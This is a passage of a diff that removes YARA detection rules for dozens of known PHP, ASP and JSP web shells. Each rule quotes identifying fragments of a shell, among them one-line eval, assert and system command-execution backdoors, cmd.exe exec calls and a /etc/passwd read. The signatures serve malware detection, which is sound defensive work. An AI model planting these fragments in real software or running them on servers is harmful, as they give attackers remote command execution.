-		date = "2014/01/28"
-		score = 70
-		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
-	strings:
-		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s9 = "class=linelisting><nobr>POST (php eval)</td><"
-	condition:
-		1 of them
-}
-rule webshell_asp_ntdaddy {
-	meta:
-		description = "Web Shell - file ntdaddy.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "c5e6baa5d140f73b4e16a6cfde671c68"
-	strings:
-		$s9 =  "if  FP  =  \"RefreshFolder\"  or  "
-		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
-	condition:
-		1 of them
-}
-rule webshell_MySQL_Web_Interface_Version_0_8 {
-	meta:
-		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "36d4f34d0a22080f47bb1cb94107c60f"
-	strings:
-		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
-	condition:
-		all of them
-}
-rule webshell_elmaliseker_2 {
-	meta:
-		description = "Web Shell - file elmaliseker.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
-	strings:
-		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
-		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
-	condition:
-		all of them
-}
-rule webshell_ASP_RemExp {
-	meta:
-		description = "Web Shell - file RemExp.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
-	strings:
-		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
-		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
-	condition:
-		all of them
-}
-rule webshell_jsp_list1 {
-	meta:
-		description = "Web Shell - file list1.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
-	strings:
-		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
-		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
-	condition:
-		all of them
-}
-rule webshell_phpkit_1_0_odd {
-	meta:
-		description = "Web Shell - file odd.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
-	strings:
-		$s0 = "include('php://input');" fullword
-		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
-		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_123 {
-	meta:
-		description = "Web Shell - file 123.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "c691f53e849676cac68a38d692467641"
-	strings:
-		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
-		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
-		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
-	condition:
-		all of them
-}
-rule webshell_asp_1 {
-	meta:
-		description = "Web Shell - file 1.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "8991148adf5de3b8322ec5d78cb01bdb"
-	strings:
-		$s4 = "!22222222222222222222222222222222222222222222222222" fullword
-		$s8 = "<%eval request(\"pass\")%>" fullword
-	condition:
-		all of them
-}
-rule webshell_ASP_tool {
-	meta:
-		description = "Web Shell - file tool.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "4ab68d38527d5834e9c1ff64407b34fb"
-	strings:
-		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
-		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
-		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
-	condition:
-		2 of them
-}
-rule webshell_cmd_win32 {
-	meta:
-		description = "Web Shell - file cmd_win32.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
-	strings:
-		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
-		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
-	condition:
-		2 of them
-}
-rule webshell_jsp_jshell {
-	meta:
-		description = "Web Shell - file jshell.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "124b22f38aaaf064cef14711b2602c06"
-	strings:
-		$s0 = "kXpeW[\"" fullword
-		$s4 = "[7b:g0W@W<" fullword
-		$s5 = "b:gHr,g<" fullword
-		$s8 = "RhV0W@W<" fullword
-		$s9 = "S_MR(u7b" fullword
-	condition:
-		all of them
-}
-rule webshell_ASP_zehir4 {
-	meta:
-		description = "Web Shell - file zehir4.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "7f4e12e159360743ec016273c3b9108c"
-	strings:
-		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
-	condition:
-		all of them
-}
-rule webshell_wsb_idc {
-	meta:
-		description = "Web Shell - file idc.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "7c5b1b30196c51f1accbffb80296395f"
-	strings:
-		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
-		$s3 = "{eval($_GET['idc']);}" fullword
-	condition:
-		1 of them
-}
-rule webshell_cpg_143_incl_xpl {
-	meta:
-		description = "Web Shell - file cpg_143_incl_xpl.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "5937b131b67d8e0afdbd589251a5e176"
-	strings:
-		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
-		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
-	condition:
-		1 of them
-}
-rule webshell_mumaasp_com {
-	meta:
-		description = "Web Shell - file mumaasp.com.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "cce32b2e18f5357c85b6d20f564ebd5d"
-	strings:
-		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
-	condition:
-		all of them
-}
-rule webshell_php_404 {
-	meta:
-		description = "Web Shell - file 404.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "ced050df5ca42064056a7ad610a191b3"
-	strings:
-		$s0 = "$pass = md5(md5(md5($pass)));" fullword
-	condition:
-		all of them
-}
-rule webshell_webshell_cnseay_x {
-	meta:
-		description = "Web Shell - file webshell-cnseay-x.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
-	strings:
-		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
-	condition:
-		all of them
-}
-rule webshell_asp_up {
-	meta:
-		description = "Web Shell - file up.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "f775e721cfe85019fe41c34f47c0d67c"
-	strings:
-		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
-		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
-	condition:
-		1 of them
-}
-rule webshell_phpkit_0_1a_odd {
-	meta:
-		description = "Web Shell - file odd.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "3c30399e7480c09276f412271f60ed01"
-	strings:
-		$s1 = "include('php://input');" fullword
-		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
-		$s4 = "// uses include('php://input') to execute arbritary code" fullword
-		$s5 = "// php://input based backdoor" fullword
-	condition:
-		2 of them
-}
-rule webshell_ASP_cmd {
-	meta:
-		description = "Web Shell - file cmd.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "97af88b478422067f23b001dd06d56a9"
-	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
-	condition:
-		all of them
-}
-rule webshell_PHP_Shell_x3 {
-	meta:
-		description = "Web Shell - file PHP Shell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
-	strings:
-		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
-		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
-		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
-	condition:
-		2 of them
-}
-rule webshell_PHP_g00nv13 {
-	meta:
-		description = "Web Shell - file g00nv13.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "35ad2533192fe8a1a76c3276140db820"
-	strings:
-		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
-		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
-	condition:
-		all of them
-}
-rule webshell_php_h6ss {
-	meta:
-		description = "Web Shell - file h6ss.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "272dde9a4a7265d6c139287560328cd5"
-	strings:
-		$s0 = "<?php eval(gzuncompress(base64_decode(\""
-	condition:
-		all of them
-}
-rule webshell_jsp_zx {
-	meta:
-		description = "Web Shell - file zx.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "67627c264db1e54a4720bd6a64721674"
-	strings:
-		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
-	condition:
-		all of them
-}
-rule webshell_Ani_Shell {
-	meta:
-		description = "Web Shell - file Ani-Shell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "889bfc9fbb8ee7832044fc575324d01a"
-	strings:
-		$s0 = "$Python_CODE = \"I"
-		$s6 = "$passwordPrompt = \"\\n================================================="
-		$s7 = "fputs ($sockfd ,\"\\n==============================================="
-	condition:
-		1 of them
-}
-rule webshell_jsp_k8cmd {
-	meta:
-		description = "Web Shell - file k8cmd.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "b39544415e692a567455ff033a97a682"
-	strings:
-		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_cmd {
-	meta:
-		description = "Web Shell - file cmd.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "5391c4a8af1ede757ba9d28865e75853"
-	strings:
-		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_k81 {
-	meta:
-		description = "Web Shell - file k81.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "41efc5c71b6885add9c1d516371bd6af"
-	strings:
-		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
-		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
-	condition:
-		1 of them
-}
-rule webshell_ASP_zehir {
-	meta:
-		description = "Web Shell - file zehir.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "0061d800aee63ccaf41d2d62ec15985d"
-	strings:
-		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
-	condition:
-		all of them
-}
-rule webshell_Worse_Linux_Shell {
-	meta:
-		description = "Web Shell - file Worse Linux Shell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
-	strings:
-		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
-	condition:
-		all of them
-}
-rule webshell_zacosmall {
-	meta:
-		description = "Web Shell - file zacosmall.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "5295ee8dc2f5fd416be442548d68f7a6"
-	strings:
-		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
-	condition:
-		all of them
-}
-rule webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
-	meta:
-		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
-	strings:
-		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
-	condition:
-		all of them
-}
-rule webshell_redirect {
-	meta:
-		description = "Web Shell - file redirect.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "97da83c6e3efbba98df270cc70beb8f8"
-	strings:
-		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
-	condition:
-		all of them
-}
-rule webshell_jsp_cmdjsp {
-	meta:
-		description = "Web Shell - file cmdjsp.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "b815611cc39f17f05a73444d699341d4"
-	strings:
-		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
-	condition:
-		all of them
-}
-rule webshell_Java_Shell {
-	meta:
-		description = "Web Shell - file Java Shell.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
-	strings:
-		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
-		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
-	condition:
-		1 of them
-}
-rule webshell_asp_1d {
-	meta:
-		description = "Web Shell - file 1d.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "fad7504ca8a55d4453e552621f81563c"
-	strings:
-		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
-	condition:
-		all of them
-}
-rule webshell_jsp_IXRbE {
-	meta:
-		description = "Web Shell - file IXRbE.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "e26e7e0ebc6e7662e1123452a939e2cd"
-	strings:
-		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
-	condition:
-		all of them
-}
-rule webshell_PHP_G5 {
-	meta:
-		description = "Web Shell - file G5.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "95b4a56140a650c74ed2ec36f08d757f"
-	strings:
-		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
-	condition:
-		all of them
-}
-rule webshell_PHP_r57142 {
-	meta:
-		description = "Web Shell - file r57142.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
-	strings:
-		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_tree {
-	meta:
-		description = "Web Shell - file tree.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
-	strings:
-		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
-		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
-	condition:
-		all of them
-}
-rule webshell_C99madShell_v_3_0_smowu {
-	meta:
-		description = "Web Shell - file smowu.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "74e1e7c7a6798f1663efb42882b85bee"
-	strings:
-		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
-		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
-	condition:
-		1 of them
-}
-rule webshell_simple_backdoor {
-	meta:
-		description = "Web Shell - file simple-backdoor.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "f091d1b9274c881f8e41b2f96e6b9936"
-	strings:
-		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
-		$s1 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s4 = "system($cmd);" fullword
-	condition:
-		2 of them
-}
-rule webshell_PHP_404 {
-	meta:
-		description = "Web Shell - file 404.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "078c55ac475ab9e028f94f879f548bca"
-	strings:
-		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
-	condition:
-		all of them
-}
-rule webshell_Macker_s_Private_PHPShell {
-	meta:
-		description = "Web Shell - file Macker's Private PHPShell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "e24cbf0e294da9ac2117dc660d890bb9"
-	strings:
-		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
-		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
-		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
-	condition:
-		all of them
-}
-rule webshell_Antichat_Shell_v1_3_2 {
-	meta:
-		description = "Web Shell - file Antichat Shell v1.3.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "40d0abceba125868be7f3f990f031521"
-	strings:
-		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
-	condition:
-		all of them
-}
-rule webshell_Safe_mode_breaker {
-	meta:
-		description = "Web Shell - file Safe mode breaker.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "5bd07ccb1111950a5b47327946bfa194"
-	strings:
-		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
-		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
-	condition:
-		1 of them
-}
-rule webshell_Sst_Sheller {
-	meta:
-		description = "Web Shell - file Sst-Sheller.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "d93c62a0a042252f7531d8632511ca56"
-	strings:
-		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
-		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
-	condition:
-		all of them
-}
-rule webshell_jsp_list {
-	meta:
-		description = "Web Shell - file list.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "1ea290ff4259dcaeb680cec992738eda"
-	strings:
-		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
-		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
-		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
-	condition:
-		all of them
-}
-rule webshell_PHPJackal_v1_5 {
-	meta:
-		description = "Web Shell - file PHPJackal v1.5.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "d76dc20a4017191216a0315b7286056f"
-	strings:
-		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
-		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
-	condition:
-		all of them
-}
-rule webshell_customize {
-	meta:
-		description = "Web Shell - file customize.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "d55578eccad090f30f5d735b8ec530b1"
-	strings:
-		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
-	condition:
-		all of them
-}
-rule webshell_s72_Shell_v1_1_Coding {
-	meta:
-		description = "Web Shell - file s72 Shell v1.1 Coding.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "c2e8346a5515c81797af36e7e4a3828e"
-	strings:
-		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
-	condition:
-		all of them
-}
-rule webshell_jsp_sys3 {
-	meta:
-		description = "Web Shell - file sys3.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "b3028a854d07674f4d8a9cf2fb6137ec"
-	strings:
-		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
-		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
-		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_guige02 {
-	meta:
-		description = "Web Shell - file guige02.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "a3b8b2280c56eaab777d633535baf21d"
-	strings:
-		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
-		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
-	condition:
-		all of them
-}
-rule webshell_php_ghost {
-	meta:
-		description = "Web Shell - file ghost.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "38dc8383da0859dca82cf0c943dbf16d"
-	strings:
-		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
-		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
-		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
-	condition:
-		all of them
-}
-rule webshell_WinX_Shell {
-	meta:
-		description = "Web Shell - file WinX Shell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "17ab5086aef89d4951fe9b7c7a561dda"
-	strings:
-		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
-		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
-	condition:
-		all of them
-}
-rule webshell_Crystal_Crystal {
-	meta:
-		description = "Web Shell - file Crystal.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "fdbf54d5bf3264eb1c4bff1fac548879"
-	strings:
-		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
-		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
-	condition:
-		all of them
-}
-rule webshell_r57_1_4_0 {
-	meta:
-		description = "Web Shell - file r57.1.4.0.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "574f3303e131242568b0caf3de42f325"
-	strings:
-		$s4 = "@ini_set('error_log',NULL);" fullword
-		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
-		$s7 = "@ini_restore(\"disable_functions\");" fullword
-		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_hsxa1 {
-	meta:
-		description = "Web Shell - file hsxa1.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "5686d5a38c6f5b8c55095af95c2b0244"
-	strings:
-		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
-	condition:
-		all of them
-}
-rule webshell_asp_ajn {
-	meta:
-		description = "Web Shell - file ajn.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "aaafafc5d286f0bff827a931f6378d04"
-	strings:
-		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
-		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
-	condition:
-		all of them
-}
-rule webshell_php_cmd {
-	meta:
-		description = "Web Shell - file cmd.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
-	strings:
-		$s0 = "if($_GET['cmd']) {" fullword
-		$s1 = "// cmd.php = Command Execution" fullword
-		$s7 = "  system($_GET['cmd']);" fullword
-	condition:
-		all of them
-}
-rule webshell_asp_list {
-	meta:
-		description = "Web Shell - file list.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
-	strings:
-		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
-		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
-	condition:
-		all of them
-}
-rule webshell_PHP_co {
-	meta:
-		description = "Web Shell - file co.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "62199f5ac721a0cb9b28f465a513874c"
-	strings:
-		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
-		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
-	condition:
-		all of them
-}
-rule webshell_PHP_150 {
-	meta:
-		description = "Web Shell - file 150.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "400c4b0bed5c90f048398e1d268ce4dc"
-	strings:
-		$s0 = "HJ3HjqxclkZfp"
-		$s1 = "<? eval(gzinflate(base64_decode('" fullword
-	condition:
-		all of them
-}
-rule webshell_jsp_cmdjsp_2 {
-	meta:
-		description = "Web Shell - file cmdjsp.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
-	strings:
-		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
-		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
-	condition:
-		all of them
-}
-rule webshell_PHP_c37 {
-	meta:
-		description = "Web Shell - file c37.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
-	strings:
-		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
-		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
-	condition:
-		all of them
-}
-rule webshell_PHP_b37 {
-	meta:
-		description = "Web Shell - file b37.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "0421445303cfd0ec6bc20b3846e30ff0"
-	strings:
-		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
-	condition:
-		all of them
-}
-rule webshell_php_backdoor {
-	meta:
-		description = "Web Shell - file php-backdoor.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
-	strings:
-		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
-		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
-	condition:
-		all of them
-}
-rule webshell_asp_dabao {
-	meta:
-		description = "Web Shell - file dabao.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "3919b959e3fa7e86d52c2b0a91588d5d"
-	strings:
-		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
-		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
-	condition:
-		all of them
-}
-rule webshell_php_2 {
-	meta:
-		description = "Web Shell - file 2.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "267c37c3a285a84f541066fc5b3c1747"
-	strings:
-		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
-	condition:
-		all of them
-}
-rule webshell_asp_cmdasp {
-	meta:
-		description = "Web Shell - file cmdasp.asp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "57b51418a799d2d016be546f399c2e9b"
-	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
-		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
-	condition:
-		all of them
-}
-rule webshell_spjspshell {
-	meta:
-		description = "Web Shell - file spjspshell.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		hash = "d39d51154aaad4ba89947c459a729971"
-	strings:
